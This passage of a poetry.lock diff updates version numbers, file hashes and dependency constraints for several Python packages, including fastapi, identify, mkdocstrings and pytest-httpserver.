-    {file = "fastapi-0.115.8-py3-none-any.whl", hash = "sha256:753a96dd7e036b34eeef8babdfcfe3f28ff79648f86551eb36bfc1b0bf4a8cbf"},
-    {file = "fastapi-0.115.8.tar.gz", hash = "sha256:0ce9111231720190473e222cdf0f07f7206ad7e53ea02beb1d2dc36e2f0741e9"},
+    {file = "fastapi-0.115.9-py3-none-any.whl", hash = "sha256:4a439d7923e4de796bcc88b64e9754340fcd1574673cbd865ba8a99fe0d28c56"},
+    {file = "fastapi-0.115.9.tar.gz", hash = "sha256:9d7da3b196c5eed049bc769f9475cd55509a112fbe031c0ef2f53768ae68d13f"},
 ]
 
 [package.dependencies]
@@ -701,13 +701,13 @@ zstd = ["zstandard (>=0.18.0)"]
 
 [[package]]
 name = "identify"
-version = "2.6.7"
+version = "2.6.8"
 description = "File identification library for Python"
 optional = false
 python-versions = ">=3.9"
 files = [
-    {file = "identify-2.6.7-py2.py3-none-any.whl", hash = "sha256:155931cb617a401807b09ecec6635d6c692d180090a1cedca8ef7d58ba5b6aa0"},
-    {file = "identify-2.6.7.tar.gz", hash = "sha256:3fa266b42eba321ee0b2bb0936a6a6b9e36a1351cbb69055b3082f4193035684"},
+    {file = "identify-2.6.8-py2.py3-none-any.whl", hash = "sha256:83657f0f766a3c8d0eaea16d4ef42494b39b34629a4b3192a9d020d349b3e255"},
+    {file = "identify-2.6.8.tar.gz", hash = "sha256:61491417ea2c0c5c670484fd8abbb34de34cdae1e5f39a73ee65e48e4bb663fc"},
 ]
 
 [package.extras]
@@ -1140,13 +1140,13 @@ min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-imp
 
 [[package]]
 name = "mkdocs-autorefs"
-version = "1.3.1"
+version = "1.4.0"
 description = "Automatically link across pages in MkDocs."
 optional = false
 python-versions = ">=3.9"
 files = [
-    {file = "mkdocs_autorefs-1.3.1-py3-none-any.whl", hash = "sha256:18c504ae4d3ee7f344369bb26cb31d4105569ee252aab7d75ec2734c2c8b0474"},
-    {file = "mkdocs_autorefs-1.3.1.tar.gz", hash = "sha256:a6d30cbcccae336d622a66c2418a3c92a8196b69782774529ad441abb23c0902"},
+    {file = "mkdocs_autorefs-1.4.0-py3-none-any.whl", hash = "sha256:bad19f69655878d20194acd0162e29a89c3f7e6365ffe54e72aa3fd1072f240d"},
+    {file = "mkdocs_autorefs-1.4.0.tar.gz", hash = "sha256:a9c0aa9c90edbce302c09d050a3c4cb7c76f8b7b2c98f84a7a05f53d00392156"},
 ]
 
 [package.dependencies]
@@ -1229,13 +1229,13 @@ files = [
 
 [[package]]
 name = "mkdocstrings"
-version = "0.28.1"
+version = "0.28.2"
 description = "Automatic documentation from sources, for MkDocs."
 optional = false
 python-versions = ">=3.9"
 files = [
-    {file = "mkdocstrings-0.28.1-py3-none-any.whl", hash = "sha256:a5878ae5cd1e26f491ff084c1f9ab995687d52d39a5c558e9b7023d0e4e0b740"},
-    {file = "mkdocstrings-0.28.1.tar.gz", hash = "sha256:fb64576906771b7701e8e962fd90073650ff689e95eb86e86751a66d65ab4489"},
+    {file = "mkdocstrings-0.28.2-py3-none-any.whl", hash = "sha256:57f79c557e2718d217d6f6a81bf75a0de097f10e922e7e5e00f085c3f0ff6895"},
+    {file = "mkdocstrings-0.28.2.tar.gz", hash = "sha256:9b847266d7a588ea76a8385eaebe1538278b4361c0d1ce48ed005be59f053569"},
 ]
 
 [package.dependencies]
@@ -1244,7 +1244,7 @@ Jinja2 = ">=2.11.1"
 Markdown = ">=3.6"
 MarkupSafe = ">=1.1"
 mkdocs = ">=1.4"
-mkdocs-autorefs = ">=1.3"
+mkdocs-autorefs = ">=1.4"
 mkdocs-get-deps = ">=0.2"
 pymdown-extensions = ">=6.3"
 typing-extensions = {version = ">=4.1", markers = "python_version < \"3.10\""}
@@ -1256,19 +1256,19 @@ python-legacy = ["mkdocstrings-python-legacy (>=0.2.1)"]
 
 [[package]]
 name = "mkdocstrings-python"
-version = "1.16.1"
+version = "1.16.2"
 description = "A Python handler for mkdocstrings."
 optional = false
 python-versions = ">=3.9"
 files = [
-    {file = "mkdocstrings_python-1.16.1-py3-none-any.whl", hash = "sha256:b88ff6fc6a293cee9cb42313f1cba37a2c5cdf37bcc60b241ec7ab66b5d41b58"},
-    {file = "mkdocstrings_python-1.16.1.tar.gz", hash = "sha256:d7152d17da74d3616a0f17df5d2da771ecf7340518c158650e5a64a0a95973f4"},
+    {file = "mkdocstrings_python-1.16.2-py3-none-any.whl", hash = "sha256:ff7e719404e59ad1a72f1afbe854769984c889b8fa043c160f6c988e1ad9e966"},
+    {file = "mkdocstrings_python-1.16.2.tar.gz", hash = "sha256:942ec1a2e0481d28f96f93be3d6e343cab92a21e5baf01c37dd2d7236c4d0bd7"},
 ]
 
 [package.dependencies]
 griffe = ">=0.49"
-mkdocs-autorefs = ">=1.2"
-mkdocstrings = ">=0.28"
+mkdocs-autorefs = ">=1.4"
+mkdocstrings = ">=0.28.2"
 typing-extensions = {version = ">=4.0", markers = "python_version < \"3.11\""}
 
 [[package]]
@@ -1983,13 +1983,13 @@ testing = ["covdefaults (>=2.3)", "coverage (>=7.6.1)", "pytest-mock (>=3.14)"]
 
 [[package]]
 name = "pytest-httpserver"
-version = "1.1.1"
+version = "1.1.2"
 description = "pytest-httpserver is a httpserver for pytest"
 optional = false
-python-versions = ">=3.8"
+python-versions = ">=3.9"
 files = [
-    {file = "pytest_httpserver-1.1.1-py3-none-any.whl", hash = "sha256:aadc744bfac773a2ea93d05c2ef51fa23c087e3cc5dace3ea9d45cdd4bfe1fe8"},
-    {file = "pytest_httpserver-1.1.1.tar.gz", hash = "sha256:e5c46c62c0aa65e5d4331228cb2cb7db846c36e429c3e74ca806f284806bf7c6"},
+    {file = "pytest_httpserver-1.1.2-py3-none-any.whl", hash = "sha256:93009d79574fc982301e8494fdea0884f21bb0caf3bcc719151dfbd1e3a943ea"},
+    {file = "pytest_httpserver-1.1.2.tar.gz", hash = "sha256:38d0b726580d05c47cbd0ced1ecb36a51668ef1596cdc6d70a9cfa2b3cc00ebd"},
 ]
 
 [package.dependencies]